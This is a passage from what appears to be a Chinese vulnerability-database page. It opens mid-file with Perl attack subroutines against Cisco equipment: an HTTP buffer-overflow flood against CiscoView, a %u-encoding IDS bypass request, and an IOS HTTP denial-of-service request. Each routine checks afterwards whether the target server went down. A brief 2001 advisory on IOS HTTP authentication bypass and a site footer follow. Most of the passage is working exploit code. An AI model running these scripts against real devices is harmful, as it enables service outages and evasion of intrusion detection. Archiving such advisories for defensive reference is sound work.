                                      unless ($sockd2){die "Vulnerability successful exploited. Target server is down ...\n\n"};

  print "Vulnerability unsuccessful exploited. Target server is still up after $rep logins ...\\n";
  close($sockd2);
  exit(1);
}

sub cisco12 # Cisco CatOS CiscoView HTTP Server Buffer Overflow Vulnerability
{
  my $serv = $host;
  my $l =100;
  my $vuln = "";
  my $long = "A" x $l;

  my $sockd = IO::Socket::INET->new (
                                     PeerAddr => $serv,
                                     PeerPort => "(80)",
                                     Proto => "tcp")
                                     || die "No http server detected on $serv ...\n\n";

  for ($k=0; $k<=50; $k++) {
                              my $vuln = "GET " . $long . " HTTP/1.0\n\n";
                              print $sockd "$vuln\n\n";
                              sleep(1);
                              $l = $l + 100;
                           }

  close($sockd);
  print "Packet sent ...\n";
  sleep(1);
  print("Now checking server's status ...\n");
  sleep(2);

  my $sockd2 = IO::Socket::INET->new (
                                      Proto=>"tcp",
                                      PeerAddr=>$serv,
                                      PeerPort=>"http(80)",);
                                      unless ($sockd2){die "Vulnerability successful exploited. Target server is down ...\n\n"};

  print "Target is not vulnerable. Server is still up after 5 kb of buffer ...)\n";
  close($sockd2);
  exit(1);
}

sub cisco13 # %u Encoding IDS Bypass Vulnerability (UTF)
{
  my $serv = $host;
  my $vuln = "GET %u002F HTTP/1.0\n\n";

  my $sockd = IO::Socket::INET->new (
                                     PeerAddr => $serv,
                                     PeerPort => "(80)",
                                     Proto => "tcp")
                                     || die "No http server detected on $serv ...\n\n";

  print "Packet sent ...\n";
  print $sockd "$vuln";
  close($sockd);
  sleep(1);
  print("Now checking server's status ...\n");
  print("Please verify if directory has been listed ...\n\n");
  print("Server response :\n");
  sleep(2);
  while (<$sockd>){ print }
  exit(1);
}

sub cisco14 # Cisco IOS HTTP server DoS Vulnerability
{
  my $serv = $host;
  my $vuln = "GET /TEST?/ HTTP/1.0";

  my $sockd = IO::Socket::INET->new (
                                     Proto=>"tcp",
                                     PeerAddr=>$serv,
                                     PeerPort=>"http(80)",);
                                     unless ($sockd){die "No http server detected on $serv ...\n\n"};

  print $sockd "$vuln\n\n";
  print "Packet sent ...\n";
  close($sockd);
  sleep(1);
  print("Now checking server's status ...\n");
  sleep(2);

  my $sockd2 = IO::Socket::INET->new (
                                      Proto=>"tcp",
                                      PeerAddr=>$serv,
                                      PeerPort=>"http(80)",);
                                      unless ($sockd2){die "Vulnerability successful exploited. Target server is down ...\n\n"};

  print("Vulnerability unsuccessful exploited. Target server is still up ...\n\n");
  close($sockd2);
  exit(1);
}

		

- 漏洞信息

578
Cisco IOS HTTP Unauthorized Administrative Access

- 漏洞描述

IOS contains a flaw that may allow a malicious user to bypass authentication. The issue is triggered when an attacker sends a specially crafted URL to the HTTP server. It is possible that the flaw may allow an attacker to gain administrative privileges resulting in a loss of confidentiality, integrity, and/or availability.

- 时间线

2001-06-27 2001-06-27
2001-07-02 Unknow

- 解决方案

Cisco has released a patch to address this vulnerability.

- 相关参考

- 漏洞作者

Unknown or Incomplete
 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站